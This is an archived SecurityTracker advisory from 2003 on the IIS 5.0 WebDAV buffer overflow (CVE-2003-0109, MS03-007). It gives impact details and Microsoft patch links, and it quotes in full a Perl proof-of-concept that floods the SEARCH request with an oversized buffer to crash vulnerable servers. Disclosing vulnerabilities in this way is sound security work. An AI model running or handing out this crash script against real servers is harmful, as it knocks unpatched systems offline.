SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
(Additional Exploit Code is Available) Re: Microsoft IIS Web Server WebDAV Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006371
SecurityTracker URL:  http://securitytracker.com/id/1006371
CVE Reference:   CVE-2003-0109   (Links to External Site)
Date:  Mar 24 2003
Impact:   Execution of arbitrary code via network, Root access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.0
Description:   A buffer overflow vulnerability was reported in Microsoft Internet Information Server (IIS) in its World Wide Web Distributed Authoring and Versioning (WebDAV) protocol implementation. A remote user could execute arbitrary code with Local System privileges. Systems running on Windows 2000 are vulnerable.

A remote user can send a specially crafted HTTP header to the server to trigger the buffer overflow and execute arbitrary code. The code will run in the Local System security context, giving the remote user full control of the system.

The buffer overflow reportedly resides in ntdll.dll, used by the IIS WebDAV component.

IIS installations on Windows NT, XP, and Windows Server 2003 are reportedly not affected. IIS 4.0 reportedly does not have WebDAV enabled by default.

CERT reported in advisory CA-2003-09 that an exploit for this flaw has been publicly circulated.

Infoware.dk has provided a demonstration exploit script that will crash an affected server. The script is provided in the Source Message.

[Editor's note: See the Message History for important information about an additional exploit and about the applicability of this flaw to Windows 2000 in general.]

Impact:   A remote user can execute arbitrary code on the system in the security context of the IIS service. By default, IIS runs in the LocalSystem context.
Solution:   The vendor has released the following patch.

For all versions of Windows 2000 except Japanese NEC:

http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en

For Japanese NEC:

http://microsoft.com/downloads/details.aspx?FamilyId=FBCF9847-D3D6-4493-8DCF-9BA29263C49F&displaylang=ja

Microsoft indicates that the patch can be installed Windows 2000 SP2 or SP3. They plan to include this fix in Windows 2000 SP4.

A reboot of your system is required after installing the patch.

Microsoft has released Knowledge Base article 815021 regarding this issue, available at:

http://support.microsoft.com/default.aspx?scid=kb;en-us;815021

Microsoft has described several workarounds and tools in their advisory that can be used to mitigate this flaw, available at:

http://www.microsoft.com/technet/security/bulletin/MS03-007.asp

Vendor URL:  www.microsoft.com/technet/security/bulletin/MS03-007.asp (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
Mar 17 2003 Microsoft IIS Web Server WebDAV Buffer Overflow Lets Remote Users Execute Arbitrary Code



 Source Message Contents

Subject:  WebDav - IIS 5.0 - MS03-007




-------- Original Message --------
Subject: WebDav - IIS 5.0 - MS03-007
Date: Mon, 24 Mar 2003 17:30:22 +0100
From: matrix@infowarfare.dk
To: "bugs@securitytracker.com" <bugs@securitytracker.com>, "news@securiteam.com"
<news@securiteam.com>, "vuln@secunia.com" <vuln@secunia.com>, "vulnwatch@vulnwatch.org"
<vulnwatch@vulnwatch.org>



# Tested on :
#	    W2K SP3 + the fix -> IIS issues an error
#	    W2K SP3 -> IIS temporarily crashes
#	    W2K SP2 -> IIS temporarily crashes
# 	    W2K SP1 -> IIS does not crash, but issues a message
#		       about an internal error
#	    
#	    W2K     -> IIS does not crash, but issues a message about
#		       an internal error
#
# Microsoft Security Bulletin MS03-007
#
# DISCLAIMER: 
# The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
# In no event shall we be liable for any damages whatsoever including direct, 
indirect, 
# incidental, consequential, loss of business profits or special damages. 
# 
#  Coded by Matrix - www.infowarfare.dk
#  
#  If you put a debugger on the Inetinfo process you can see the result, 
#  And sorry about the code could be much more nice, but fuck, it works =)
#
#!/usr/bin/perl -w
#

use strict;
use IO::Socket;
use LWP::Simple;


# Globals Go Here.
my $host;		# Host being probed.
my $port;		# Webserver port.
my $Buffer;		# A x 65535
my $XMLShit;		# XML Request

$Buffer  = "A" x 65535; 
$Host_Header = "Host: 127.0.0.1\r\nContent-type: text/xml\r\nContent-Length: 133
\r\n";
$XMLShit = "<?xml version=\"1.0\"?> \r\n<g:searchrequest 
xmlns:g=\"DAV:\">\r\n<g:sql>\r\nSelect \"DAV:displayname\" from scope()
\r\n</g:sql>\r\n</g:searchrequest>\r\n";


# SUBROUTINES GO HERE. 
&intro;
&scan;
&exit; # Play safe with this .

sub intro {
&host;

sleep 3;
};

# host subroutine.
sub host {
system('cls');
print "\n WebDAV OverFlow for IIS 5.0 by Matrix.";
print "\n http://www.infowarfare.dk";
print "\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "\n Host : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "\n Port : ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};	# end host subroutine.


# scan subroutine.
sub scan {
print "\n\n";
print "\nIIS 5.0 WebDAV BufferOverflow attack - $host on port $port ...";
print "\n";
&connect;
};

# Connect subroutine.
sub connect {
my $connection = IO::Socket::INET->new(Proto =>"tcp",
                                PeerAddr =>$host,
                                PeerPort =>$port) || die "Could not connect to 
$host \n";

$connection -> autoflush(1);
# It is here we put it all together and Flush the Buffer
print $connection "SEARCH /$Buffer HTTP/1.1\r\n$Host_Header\r\n$XMLShit\r\n";
close $connection;
};  # end connect subroutine.

# exit subroutine.
sub exit{
print "\n\n\n";
exit;
};



-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC